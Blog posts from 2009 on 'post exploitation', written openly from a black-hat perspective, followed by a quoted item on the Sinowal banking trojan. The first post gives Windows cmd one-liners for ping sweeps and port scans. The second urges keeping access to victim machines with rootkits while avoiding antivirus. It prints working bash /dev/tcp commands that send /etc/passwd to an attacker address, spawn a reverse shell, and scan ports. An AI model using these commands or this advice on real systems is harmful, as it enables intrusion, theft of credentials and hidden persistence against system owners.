Thursday, January 29, 2009

Post Exploitation 2

We had discussion going on the topic Post exploitation when I realized that in my first post I didnt put any special things on windows. So I am adding that information in this second post on this topic.

Like lots of people dont know that there are FOR loop on windows command line using which we can have a ping sweep or port scan from cmd without any thirdparty tools.

Ex.

Ping Sweep: Using following command we can run a ping sweep
FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

This command will run a ping sweep on 10.10.10.0/24

Command line port scanner using ftp client:
The windows ftp client can be used as a port scanner.
But
C:\> ftp [IP_address]
This is not allowing to put port number and defaults to port 21 for connection.
But... we can specify a destination port in a ftp command file
- open [IP_addr] [port]

FTP client then can read this ftp commands file and execute them.

C:\> ftp -s:[filename]

So using this and FOR loop together...

for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Now the ports.txt will have output of the port scanner.

One more option in the FOR command let us use file as input

Ex. There is file with name PTips.txt containing one IP address each line
so following command will iterate through the file.

FOR /F "delims=^" %i in (PTips.txt) do ping %i

C:\>ping 222.222.222.222
Pinging 222.222.222.222 with 32 bytes of data:
Reply from 222.222.222.222: Destination net unreachable.
...
...

One more addition
Having only cmd in windows does put lot of restrictions.
Lots of time I miss the simple commands like in linux to get HTML pages.
Can we download HTML pages on windows without Browser ???
...
...
...
Yes We Can
The problem with telnet is it dont allows us to redirect the output or screen to some file...
So... so we use -f for creating log of the telnet session.
Ex. Windows telnet as simple HTTP GET tool
C:\> telnet -f log.txt
Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
Microsoft Telnet>o in.yahoo.com 80
...
...
Microsoft Telnet>sen GET / HTTP/1.0
...
Html contents will scroll down all of sudden but dont worry,
all that content will be saved to the log file: log.txt
There you go.







Tuesday, January 27, 2009

Post Exploitation...

One of my fren asked that "scenario is that you have gotta interactive shell on remote machine (linux/windows) with admin privileges (not semi interactive like c99, r57 etc. i.e. suppose you have got the command prompt / console)"

Now what do you think you would be doing as "POST EXPLOITATION" to have complete control over the server.

As per his request my answer is from black hat perspective...

After getting access to any victim machine most important thing is to maintain access. And a hacker should do all things necessary to maintain access.

I had herd comment from some one that he would install some service like VNC. Ofcourse this is lame answer according to me. But it draws attention to a basic point should we install some different backdoor ? I would rather suggest use of the existing service as backdoor instead of creating a new one. Becuase at this point we have to consider the fact that normally there would be some firewall in between attacker and the victim. So creating a new backdoor might not be usefull if the firewall is not allowing that service to accept connections. Anyways installing new backdoor means more files transfered to the victim, therefore more chances of getting detected.

If one want to use the backdoor then it should be used with addition of root kit ofcourse.
E.g.
Windows Rootkit ex. AFX Windows Rootkit: This rootkit will hide processes, files, folders
registry keys and netstat entries from Windows 95/98/ME/NT/2k/XP/2003

Linux Rootkits: No particular examaple I am giving, there are lots of which hide processes,files etc.

Using Inbuild linux Tools instead of external backdoors
For linux I would rather use the inbuild tools in linux to do things for me.
Most importatnt reason for this is "No external tool mean nothing for detect for antivirus" B-)

On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
Ex.
Victim>echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
Hello WOrld

Not Imressed then look at this

Victim>cat /etc/passwd > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
root:x:0:0:root:/root:bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
...

Transfer file without using even nc

Ok file transfer could be done What else do I want to do on my rooted box ?
have Backdoor shell,Scan for other Machines can we do that without external tools ???
...
...

Of course we can
...
How ??
Linux /dev/tcp .... is the key

Victim$>/bin/bash -i > /dev/tcp/10.10.10.66/2345
0<&1 2>&1

Attacker>nc -l -p 2345
victim@linux:~$whoami
user12

Now Port scanning...
you guessed correct /dev/tcp :D

$ echo > /dev/tcp/10.10.10.66/25
bash: connect: Connection Refused
bash:
/dev/tcp/10.10.10.66/25: Connection refused

$ echo >
/dev/tcp/10.10.10.66/80
$ #Command successful means port 80 is listening


This is just some example you can go ahead with you own tricks... So this concludes some of the things ( only some of things.. ;) ) I would do Post Exploitation

Tuesday, January 13, 2009

Sinowal trojan: Three years old and just plain nasty

Sinowal is a dangerous piece of malware. Security analysts are just beginning to realize how much so. That’s because the Sinowal trojan is unique in its attack vector, and we need to understand what’s different about it.


“We recently discovered that, dating back as early as February 2006, the Sinowal Trojan has compromised and stolen login credentials from approximately 300,000 online bank accounts as well as a similar number of credit and debit cards. Other information such as email, and FTP accounts from numerous websites, have also been compromised and stolen.”
- RSA FraudAction Research Lab


“How can Mebroot/Sinowal do their dirty work without a malicious component? Well, because Sinowal controls the boot sequence, it can inject the malicious code into legitimate Windows Components. It will hook key functions that the Internet Explorer will use to do its day-to-day job like sending and receiving encrypted data. Yes, you are right. Mebroot/Sinowal does have full control over the encrypted data stream as it has access to it before it will be encrypted and after it has been decrypted.”
- TrustDefender Labs

Read the whole article by Michael Kassner HERE